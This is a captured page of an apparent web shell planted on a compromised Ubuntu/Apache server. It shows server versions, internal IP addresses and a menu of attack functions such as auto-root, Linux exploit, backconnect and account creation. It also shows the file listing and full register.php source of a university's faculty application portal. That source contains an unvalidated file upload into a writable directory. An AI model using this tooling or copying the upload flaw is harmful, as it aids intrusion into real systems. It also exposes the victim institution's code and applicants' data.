Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cipd /
applications /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxr-xr-x
bower_components
[ DIR ]
drwxr-xr-x
database
[ DIR ]
drwxr-xr-x
dist
[ DIR ]
drwxr-xr-x
documents
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
mailer
[ DIR ]
drwxr-xr-x
mailer-old
[ DIR ]
drwxr-xr-x
phpmailer_manual_setup
[ DIR ]
drwxr-xr-x
plugins
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
uploadDoc
[ DIR ]
drwxrwxr-x
validation
[ DIR ]
drwxr-xr-x
404.php
2.86
KB
-rw-r--r--
changePassword.php
4.67
KB
-rw-r--r--
class.user-ankittill30725.php
5.29
KB
-rw-r--r--
class.user.php
5.9
KB
-rw-r--r--
common-oldbkp.php
5.19
KB
-rw-r--r--
common.php
5.99
KB
-rw-r--r--
config.php
282
B
-rw-r--r--
dashboard.php
5.13
KB
-rw-r--r--
dbconfig.php
1.29
KB
-rw-r--r--
error_log
5.69
KB
-rw-r--r--
forgotPassword.php
4.94
KB
-rw-r--r--
fpass.php
3.11
KB
-rw-r--r--
index.php
5.86
KB
-rw-r--r--
logout.php
645
B
-rw-r--r--
page-top.php
5.8
KB
-rw-r--r--
pay-bkp15722.php
8.49
KB
-rw-r--r--
pay-oldbkp.php
5.39
KB
-rw-r--r--
pay.php
5.34
KB
-rw-r--r--
personalInformations-oldofcsed...
24.15
KB
-rw-r--r--
personalInformations.php
1
KB
-rw-r--r--
register-ankittill30725.php
16.12
KB
-rw-r--r--
register-nandini.php
14.88
KB
-rw-r--r--
register-originaltill29725.php
16.71
KB
-rw-r--r--
register.php
15.72
KB
-rw-r--r--
registrationVerify.php
2.46
KB
-rw-r--r--
resetpass.php
5.26
KB
-rw-r--r--
test-error.php
430
B
-rw-r--r--
testmail1.php
1.1
KB
-rw-r--r--
verify-bkp15722.php
12.67
KB
-rw-r--r--
verify-oldbkp.php
7.15
KB
-rw-r--r--
verify.php
9.6
KB
-rw-r--r--
viewStudentDetails.php
18.73
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : register.php
<?php // ini_set('display_errors', 1); // ini_set('display_startup_errors', 1); // error_reporting(E_ALL); session_start(); require_once 'class.user.php'; $reg_user = new USER(); if ($reg_user->is_logged_in() != "") { $reg_user->redirect('personalInformations.php'); } if (isset($_POST['btn-signup'])) { // Prepare form data $title = trim($_POST['title'] ?? ''); $studentName1 = trim($_POST['studentName'] ?? ''); $studentName = $title . " " . $studentName1; $studentEmail = trim($_POST['studentEmail'] ?? ''); $studentMobile = trim($_POST['studentMobile'] ?? ''); $institutionName = trim($_POST['institutionName'] ?? ''); $linkdinurl = trim($_POST['linkdinurl'] ?? ''); $weburl = trim($_POST['weburl'] ?? ''); $studentPassword = trim($_POST['password'] ?? ''); $tokenCode = md5(uniqid(rand())); // Domains/Subdomains/Experience $domains = $_POST['yourTitle'] ?? []; $subdomains = $_POST['subdomain'] ?? []; $experience = $_POST['experience'] ?? []; $domains_json = json_encode($domains); $subdomains_json = json_encode($subdomains); $experience_json = json_encode($experience); // File uploads $uploadDir = 'uploadDoc/'; if (!is_dir($uploadDir)) mkdir($uploadDir); // LCV (optional if used) $lcv = "Not Uploaded"; if (!empty($_FILES['lcv']['name'])) { $lcv_ext = strtolower(pathinfo($_FILES['lcv']['name'], PATHINFO_EXTENSION)); $lcv_name = $studentMobile . '-' . basename($_FILES['lcv']['name']); if (move_uploaded_file($_FILES['lcv']['tmp_name'], $uploadDir . $lcv_name)) { $lcv = $lcv_name; } } // Check if email exists $stmt = $reg_user->runQuery("SELECT * FROM studentregistration WHERE studentEmail=:studentEmail"); $stmt->execute([":studentEmail" => $studentEmail]); $row = $stmt->fetch(PDO::FETCH_ASSOC); if ($stmt->rowCount() > 0) { $msg = " <div class='alert alert-error'> <button class='close' data-dismiss='alert'>×</button> <strong>Sorry!</strong> This email ID is already exists in our database. Please try with another one. </div> "; echo "$msg"; } else { if ( $reg_user->register($studentName, $studentEmail, $studentMobile, $institutionName, $domains_json, $subdomains_json, $experience_json, $linkdinurl, $weburl, $studentPassword, $lcv, $tokenCode) ) { $studentID = $reg_user->lasdID(); $key = base64_encode($studentID); $studentID = $key; $message = " Hello $studentName,<br><br> Thanks for apply to iPD-CP, IIIT-Delhi!<br><br> You can login to check your details. <a href='https://cipd.iiitd.ac.in/applications/' target='_blank'>Click Here</a><br/><br/> Thanks, <br>iPD-CP, IIIT-Delhi Team "; $subject = "Application details are received for iPD-CP, IIIT-Delhi"; $reg_user->send_mail($studentEmail, $message, $subject); // $msg = " // <div class='alert alert-success'> // <button class='close' data-dismiss='alert'>×</button> // <strong>Success!</strong> We've sent an email to $studentEmail. // Please click the confirmation link in the email to activate your account. // </div> // "; echo "<script>alert('Thanks for registration to iPD-CP, IIIT-Delhi. Please check your email also.'); window.location.href='https://cipd.iiitd.ac.in/applications';</script>"; } else { echo "Sorry, Query could not execute..."; } } } ?> <!DOCTYPE html> <html> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title>Intelligent Product Development - Certification Program (iPD-CP), IIIT-Delhi</title> <!-- Tell the browser to be responsive to screen width --> <meta content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" name="viewport"> <!-- Bootstrap 3.3.7 --> <link rel="stylesheet" href="bower_components/bootstrap/dist/css/bootstrap.min.css"> <!-- Font Awesome --> <link rel="stylesheet" href="bower_components/font-awesome/css/font-awesome.min.css"> <!-- Ionicons --> <link rel="stylesheet" href="bower_components/Ionicons/css/ionicons.min.css"> <!-- Theme style --> <link rel="stylesheet" href="dist/css/AdminLTE.min.css"> <!-- iCheck --> <link rel="stylesheet" href="plugins/iCheck/square/blue.css"> <!-- TODO: Missing CoffeeScript 2 --> <script type="text/javascript" src="https://code.jquery.com/jquery-1.10.1.js"></script> <script type="text/javascript">//<![CDATA[ $(window).load(function(){ $('#password, #confirm_password').on('keyup', function () { if ($('#password').val() == $('#confirm_password').val()) { $('#message').html('Password matching..').css('color', 'green'); } else $('#message').html('Password not matching..').css('color', 'red'); }); }); //]]></script> <!-- Google Font --> <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Source+Sans+Pro:300,400,600,700,300italic,400italic,600italic"> </head> <body class="hold-transition register-page"> <div class="register-box" style="width: 800px"> <div class="register-logo"> <center><img src="https://cipd.iiitd.ac.in/wp-content/uploads/2025/02/CiPDlogo.png" alt="CiPD Logo" style="width:20%;" /></center> </div> <div class="register-box-body"> <p class="login-box-msg"><strong>Register here for CiPD - Adjunct Faculty Position <!--(your name, affiliation, photo, and area of research interest will be posted on the website. Other details will not be shared.)--></strong></p> <form class="form-signin" method="post" enctype="multipart/form-data"> <div class="row"> <div class="col-md-6"> <div class="form-group has-feedback"> <label><strong>Title <span style="color:#ff0000;">*</span></strong></label> <select name="title" class="form-control select2" required> <option value="Select">--Select--</option> <option value="Prof.">Prof.</option> <option value="Dr.">Dr.</option> <option value="Mr.">Mr.</option> <option value="Ms.">Ms.</option> </select> </div> <div class="form-group has-feedback"> <label><strong>Name <span style="color:#ff0000;">*</span></strong></label> <input type="text" name="studentName" class="form-control" placeholder="Full name" maxlength="50" required> <span class="glyphicon glyphicon-user form-control-feedback"></span> </div> <div class="form-group has-feedback"> <label><strong>Email <span style="color:#ff0000;">*</span></strong></label> <input type="email" class="form-control" name="studentEmail" placeholder="Email" required autocomplete="off" maxlength="50"> <span class="glyphicon glyphicon-envelope form-control-feedback"></span> </div> <div class="form-group has-feedback"> <label><strong>Mobile Number <span style="color:#ff0000;">*</span></strong></label> <input type="text" name="studentMobile" class="form-control" placeholder="Mobile No." required maxlength="11"> <span class="glyphicon glyphicon-phone form-control-feedback"></span> </div> <div class="form-group has-feedback"> <label><strong>Organization <span style="color:#ff0000;">*</span></strong></label> <input type="text" name="institutionName" id="institutionName" class="form-control" placeholder="Name of the Organization for which working" > <span class="glyphicon glyphicon-user form-control-feedback"></span> </div> <div class="form-group has-feedback"> <label><strong>Latest CV (.pdf) <span style="color:#ff0000;">*</span></strong></label> <input type="file" class="form-control" id="lcv" name="lcv" placeholder="Latest CV" accept=".pdf" autocomplete="off"> <!-- <span class="glyphicon glyphicon-user form-control-feedback"></span> --> </div> <div class="form-group has-feedback"> <input type="checkbox" id="readonlyCheckbox" name="true" checked='checked' required> <strong>All above details are true as per my knowledge.</strong> <!-- <span class="glyphicon glyphicon-user form-control-feedback"></span> --> </div> <script> const checkbox = document.getElementById('readonlyCheckbox'); checkbox.addEventListener('click', function(e) { e.preventDefault(); // Prevents changing the checkbox state }); </script> </div> <div class="col-md-6"> <div class="form-group has-feedback"> <label><strong>Domain <span style="color:#ff0000;">*</span></strong></label> <select name="yourTitle[]" class="form-control select2" id="domainSelect" multiple required> <option value="Design">Design</option> <option value="Entrepreneurship">Entrepreneurship</option> <option value="Electronics">Electronics</option> <option value="Computer Science">Computer Science</option> <option value="Product">Product</option> <option value="Embedded System">Embedded System</option> </select> </div> <div id="subdomainContainer"></div> <div id="experienceFields"></div> <div class="form-group has-feedback"> <label><strong>Your LinkedIn Profile Link (Optional)</strong></label> <input type="text" name="linkdinurl" class="form-control" placeholder="Your LinkedIn Profile Link" maxlength="200"> <span class="glyphicon glyphicon-user form-control-feedback"></span> </div> <div class="form-group has-feedback"> <label><strong>Your Website Link (Optional)</strong></label> <input type="text" name="weburl" class="form-control" placeholder="Your website link if any" maxlength="200"> <span class="glyphicon glyphicon-user form-control-feedback"></span> </div> <div class="form-group has-feedback"> <label><strong>Password <span style="color:#ff0000;">*</span></strong></label> <input type="password" id="password" name="password" class="form-control" placeholder="Password" required autocomplete="off"> <span class="glyphicon glyphicon-lock form-control-feedback"></span> </div> <div class="form-group has-feedback"> <label><strong>Confirm Password <span style="color:#ff0000;">*</span></strong></label> <input type="password" class="form-control" id="confirm_password" name="confirm_password" placeholder="Retype password" required autocomplete="off"> <span class="glyphicon glyphicon-log-in form-control-feedback"></span> </div> </div> </div> <div class="row"> <div class="col-xs-10"> <a href="index.php" class="text-center"><strong>Sign in if you have already registered.</strong></a> <div class="checkbox icheck"> <label> <span id='message'></span> </label> </div> </div> <!-- /.col --> <div class="col-xs-2"> <button type="submit" class="btn btn-primary btn-block btn-flat" name="btn-signup">Submit</button> </div> <!-- /.col --> </div> </form> </div> <!-- /.form-box --> </div> <!-- /.register-box --> <!-- jQuery 3 --> <script src="bower_components/jquery/dist/jquery.min.js"></script> <!-- Bootstrap 3.3.7 --> <script src="bower_components/bootstrap/dist/js/bootstrap.min.js"></script> <!-- iCheck --> <script src="plugins/iCheck/icheck.min.js"></script> <script> $(function () { $('input').iCheck({ checkboxClass: 'icheckbox_square-blue', radioClass: 'iradio_square-blue', increaseArea: '20%' /* optional */ }); }); </script> <script type="text/javascript"> $(document).ready(function () { $('#slct').change(function () { var value = $(this).val(); var toAppend = ''; if (value == 'Any other') { toAppend = "<input type='textbox' name='anyothervalue' id='anyothervalue' >"; $("#container").html(toAppend); return; } }); }); </script> <script src="https://cdn.jsdelivr.net/npm/select2@4.1.0-rc.0/dist/js/select2.min.js"></script> <script> const domainToSubdomains = { "Design": ["Ideation Methods", "Design Thinking", "Requirement Analysis", "Mechanical Enclosure Design", "UI/ UX and Interaction Design"], "Entrepreneurship": ["New Venture Planning", "Venture Planning, Funding & Scaling", "Finding product Market Fit", "Technology Transfer and Commercialization", "Entrepreneurial Mindset", "Market Analysis" ,"Strategy", "Finance"], "Electronics": ["Basic Electronics", "Battery Management", "Assembly & Testing", "Hardware/ Software Integration", "Schematic Design", "PCB Layout", "RTOS", "EMS"], "Computer Science": ["Object Oriented Programming"], "Product": ["Standards & Certification", "IPRs and Their Importance", "Safety", "Security"], "Embedded System": ["ARM Cortex M0-M7", "Microcontroller Interfaces & Peripherals", "Connectivity - USB, BT, Ethernet, LTE, LoRA, etc.", "Electronic Product Design", "System Architecture"] }; function createSubdomainDropdown(domain) { const subdomains = domainToSubdomains[domain] || []; const selectId = `subdomain_${domain.replace(/\s+/g, '_')}`; const html = ` <div class="form-group"> <label><strong>Select Subdomains for ${domain} <span style="color:#ff0000;">*</span></strong></label> <select name="subdomain[${domain}][]" class="form-control subdomain-select select2" id="${selectId}" multiple required> ${subdomains.map(sub => `<option value="${sub}">${sub}</option>`).join('')} </select> </div> `; return html; } function updateSubdomainDropdowns() { const selectedDomains = $('#domainSelect').val() || []; const container = $('#subdomainContainer'); container.empty(); selectedDomains.forEach(domain => { container.append(createSubdomainDropdown(domain)); }); setTimeout(() => { $('.subdomain-select').select2({ placeholder: "Select subdomains", tags: true, width: '100%' }); }, 0); $('.subdomain-select').off('change').on('change', updateExperienceFields); } function updateExperienceFields() { const container = $('#experienceFields'); container.empty(); $('.subdomain-select').each(function () { const domain = $(this).attr('id').replace('subdomain_', '').replace(/_/g, ' '); const selectedSubdomains = $(this).val() || []; selectedSubdomains.forEach(subdomain => { container.append(` <div class="form-group has-feedback"> <label><strong>Total years of experience in <u>${subdomain}</u> (${domain}) <span style="color:#ff0000;">*</span></strong></label> <input type="number" name="experience[${subdomain}]" class="form-control" placeholder="Years of experience in ${subdomain}" min="0" required> <span class="glyphicon glyphicon-user form-control-feedback"></span> </div> `); }); }); } $(document).ready(function () { $('.select2').select2({ placeholder: "Select options" }); $('#domainSelect').on('change', updateSubdomainDropdowns); }); </script> <!-- Select2 CSS --> <link href="https://cdn.jsdelivr.net/npm/select2@4.1.0-rc.0/dist/css/select2.min.css" rel="stylesheet" /> <!-- Select2 JS --> </body> </html>
Close